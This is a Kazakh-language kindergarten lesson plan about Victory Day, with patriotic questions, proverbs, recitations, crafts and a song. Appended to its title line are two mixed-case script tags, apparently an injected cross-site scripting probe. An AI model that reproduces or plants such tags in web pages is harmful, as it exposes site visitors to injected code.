Тақырыбы: «Ер есімі-ел есінде» ұйымдастырылған іс әрекеті (№9 «Қуырмаш» ересектер тобы) Тәрбиешілер: Ахметжанова М.Ж Каиргельдиева А.Б<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.05.2023

Тақырыбы: «Ер есімі-ел есінде»

Мақсаты: 9- мамыр күні туралы түсінік беру.Өз Отанын сүюге,қорғауға,халқымыздың тыныштығы мен бірлігін нығайтуға атсалысатын азамат болуға тәрбиелеу. Балалардың «Жеңіс күні!» мерекесі туралы білімдерін қалыптастыру.

 Әдіс – тәсілі: Сұрақ – жауап, түсіндіру, ойын, ән айту.
Көрнекілігі: Әр ұлт өкілдерінің суреттері, , сурет салу құралдары.

Шаттық шеңбер:

Арайланған таңды сүйетін кім?

-Мен

Жарқыраған даланы сүйетін кім?

-Мен

Туған жерді сүйетін кім?

-Мен

Ата-ананы сүйетін кім?

-Мен

Еліміздің болашағы кімдер?

-Біздер.

 Тәрбиеші:

Мамырда балалар қандай мереке өтті?

Қандай мереке келе жатыр?

Отан, Туған жер деген сөздер нені білдіреді?

Балалар ,Отан- біз өмір сүріп жатқан ел.Отан,Туған жер,Ел әр түрлі сөзбен атауға болады.

Біздің отанымыз қандай мемлекет.

Біз қай қалада  тұрамыз?

Балалардың жауабы:

Ойын: «Кім жылдам»

Тақпақтар: Адия,Малик,Адэль,Айым,М.Амир, Д.Амир.

Тәрбиеші: Балалар мен қазір мақалдың басын бастаймын , ал сендер аяқтайсыңдар.

Мақал-мәтел: 1. Отансыз адам- ормасыз бұлбұл.

2. Туған жер-алтын бесік.

3. Отан отбасынан басталады.

4. Бейбіт елде береке бар.

5. Достық болмай,тірлік болмас.

6. Отан елдің анасы,ел-ердің анасы.

7. Туған жердей жер болмас,туған елдей ел болмас.

Тәрбиеші: Балалар енді 3 топшаға бөлінеміз.

Шығармашылық жұмыс: 1 топ- әртүрлі  суреттерді жұлдыздың үстіне орналастырды. 2 топ- 9 санын  қағаздан оригами гүлдер жасап әшекейледі. 3 топ- губкадан танк көлігін құрастырды.

Ән: Жеңіс күні

Қорытынды: Жеңіс күніне арналған тақпақтармен, әнмен, ақ тілектермен аяқтадық.Шығармашылық саласында жақсы жасап шыққан топшаларды мадақтау. 

Просмотров: 334


Пікір қосу



Деректерді қолтаңбаға қосу